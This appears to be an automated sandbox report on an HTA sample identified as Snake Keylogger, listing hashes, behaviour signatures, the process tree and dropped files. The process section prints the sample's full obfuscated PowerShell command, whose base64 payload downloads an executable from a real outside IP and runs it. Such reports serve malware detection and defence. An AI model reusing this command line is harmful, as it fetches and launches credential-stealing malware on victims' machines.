Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2024 14:45

General

  • Target

    17116a0f43508549998ef6618154d77a.hta

  • Size

    115KB

  • MD5

    17116a0f43508549998ef6618154d77a

  • SHA1

    e71af8b0489263e476521a5fd6e22e5511369c4d

  • SHA256

    1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64

  • SHA512

    a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9

  • SSDEEP

    96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17116a0f43508549998ef6618154d77a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\max1sqg1\max1sqg1.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1400
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E72.tmp" "c:\Users\Admin\AppData\Local\Temp\max1sqg1\CSC1795B39263ED4A0EBBA0B5BC1AB0C443.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:8
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2184

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES9E72.tmp

    Filesize

    1KB

    MD5

    67f2e528d1fb7f96b79400c6110b52d2

    SHA1

    cd75c20daa2a07ca9ea62689274b461a17540222

    SHA256

    3dd7851e66c003d6a3fe534a55fba223f695252f89f947fbbf6fd56708dfa2b1

    SHA512

    24a6feff32f9c39a6dc8ba54ef1c3d0920843622382cd40194b020127e0f0637b6d2525513310c2e5f23b059e5316411f61bb9183fc27f9b41d44e2460a93650

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppsy2tri.1kj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\max1sqg1\max1sqg1.dll

    Filesize

    3KB

    MD5

    798357dd2e8aa64839b46445f52f3b3a

    SHA1

    98f7e290ee1647a9f6f868b41f179522af6c24fb

    SHA256

    b5cc0958f979ae246a87805dba078177c6888f2e91624b4a2193b1265e77208c

    SHA512

    d2fc3485d30eb790c9fb7d1fef612aca3682605120bd70c3b778494d561e8f930c46212bd20eaa4f017d8b3b3fc24c0444c517e2c1064c31e1183f215b92a17e

  • C:\Users\Admin\AppData\Roaming\dllhost.exe

    Filesize

    956KB

    MD5

    249f4ca7f1cc801c87cebd0cdf0b398e

    SHA1

    1241f91fa9239ed0553c33f6d3651644813f6f84

    SHA256

    b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556

    SHA512

    0b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6

  • \??\c:\Users\Admin\AppData\Local\Temp\max1sqg1\CSC1795B39263ED4A0EBBA0B5BC1AB0C443.TMP

    Filesize

    652B

    MD5

    b3fe99fd1ceac62d632de63fbb9a374f

    SHA1

    39c9441329c8b085371db128172026be73aa0ead

    SHA256

    0f3d8e9e2454f80799599c5e2cfa6d4dc041b8bf24f4db1c8846140a0b3d1dfa

    SHA512

    f82c3cd0652eb3b5960450a668985edc8fe6dc656abf09d74a13d5979528a83bcdd0971d458f6f4cb822b69086c9b1c3e40ef394f6c72e2d8d01d52e2cd50f83

  • \??\c:\Users\Admin\AppData\Local\Temp\max1sqg1\max1sqg1.0.cs

    Filesize

    475B

    MD5

    74ac079a164eedfd18ee0237dead2da7

    SHA1

    62575f712ded8ea2637ee5e5eda8ae9cf2919dc1

    SHA256

    6c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615

    SHA512

    7994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb

  • \??\c:\Users\Admin\AppData\Local\Temp\max1sqg1\max1sqg1.cmdline

    Filesize

    369B

    MD5

    564301798ac68b3dc669c376ae48f2a0

    SHA1

    3946a25bda29661b541882576bf041b101923ddb

    SHA256

    671f212c5205a3956b51034d40b368e7d0593d5c50df74e58e3953e4cecf91f0

    SHA512

    39024f0c0ae1fb6967fd09deb17c2099e736070b72dd277f0e95bb9a5ee59477a64111a59adade12f007466e4be0af5ad022059b2742581881157d768aa50525

  • memory/2184-87-0x0000000006680000-0x0000000006842000-memory.dmp

    Filesize

    1.8MB

  • memory/2184-84-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2184-85-0x0000000005270000-0x000000000530C000-memory.dmp

    Filesize

    624KB

  • memory/2184-86-0x0000000006460000-0x00000000064B0000-memory.dmp

    Filesize

    320KB

  • memory/2184-88-0x0000000006550000-0x00000000065E2000-memory.dmp

    Filesize

    584KB

  • memory/2184-89-0x0000000006500000-0x000000000650A000-memory.dmp

    Filesize

    40KB

  • memory/3384-41-0x0000000007CF0000-0x0000000007D01000-memory.dmp

    Filesize

    68KB

  • memory/3384-20-0x0000000007760000-0x0000000007792000-memory.dmp

    Filesize

    200KB

  • memory/3384-21-0x000000006D800000-0x000000006D84C000-memory.dmp

    Filesize

    304KB

  • memory/3384-33-0x00000000077A0000-0x00000000077BE000-memory.dmp

    Filesize

    120KB

  • memory/3384-34-0x0000000007A70000-0x0000000007B13000-memory.dmp

    Filesize

    652KB

  • memory/3384-35-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-36-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-37-0x00000000081A0000-0x000000000881A000-memory.dmp

    Filesize

    6.5MB

  • memory/3384-38-0x0000000007840000-0x000000000785A000-memory.dmp

    Filesize

    104KB

  • memory/3384-39-0x0000000007B80000-0x0000000007B8A000-memory.dmp

    Filesize

    40KB

  • memory/3384-40-0x0000000007D90000-0x0000000007E26000-memory.dmp

    Filesize

    600KB

  • memory/3384-0-0x0000000070F4E000-0x0000000070F4F000-memory.dmp

    Filesize

    4KB

  • memory/3384-42-0x0000000007D20000-0x0000000007D2E000-memory.dmp

    Filesize

    56KB

  • memory/3384-43-0x0000000007D30000-0x0000000007D44000-memory.dmp

    Filesize

    80KB

  • memory/3384-44-0x0000000007D70000-0x0000000007D8A000-memory.dmp

    Filesize

    104KB

  • memory/3384-45-0x0000000007D60000-0x0000000007D68000-memory.dmp

    Filesize

    32KB

  • memory/3384-22-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-23-0x000000006D960000-0x000000006DCB4000-memory.dmp

    Filesize

    3.3MB

  • memory/3384-19-0x00000000067F0000-0x000000000683C000-memory.dmp

    Filesize

    304KB

  • memory/3384-18-0x00000000067C0000-0x00000000067DE000-memory.dmp

    Filesize

    120KB

  • memory/3384-17-0x0000000006330000-0x0000000006684000-memory.dmp

    Filesize

    3.3MB

  • memory/3384-58-0x0000000007D60000-0x0000000007D68000-memory.dmp

    Filesize

    32KB

  • memory/3384-64-0x0000000070F4E000-0x0000000070F4F000-memory.dmp

    Filesize

    4KB

  • memory/3384-65-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-66-0x0000000008020000-0x0000000008042000-memory.dmp

    Filesize

    136KB

  • memory/3384-67-0x0000000008DD0000-0x0000000009374000-memory.dmp

    Filesize

    5.6MB

  • memory/3384-6-0x00000000060E0000-0x0000000006146000-memory.dmp

    Filesize

    408KB

  • memory/3384-80-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-81-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-7-0x00000000061C0000-0x0000000006226000-memory.dmp

    Filesize

    408KB

  • memory/3384-5-0x0000000005800000-0x0000000005822000-memory.dmp

    Filesize

    136KB

  • memory/3384-4-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-2-0x0000000070F40000-0x00000000716F0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-3-0x0000000005AB0000-0x00000000060D8000-memory.dmp

    Filesize

    6.2MB

  • memory/3384-1-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

    Filesize

    216KB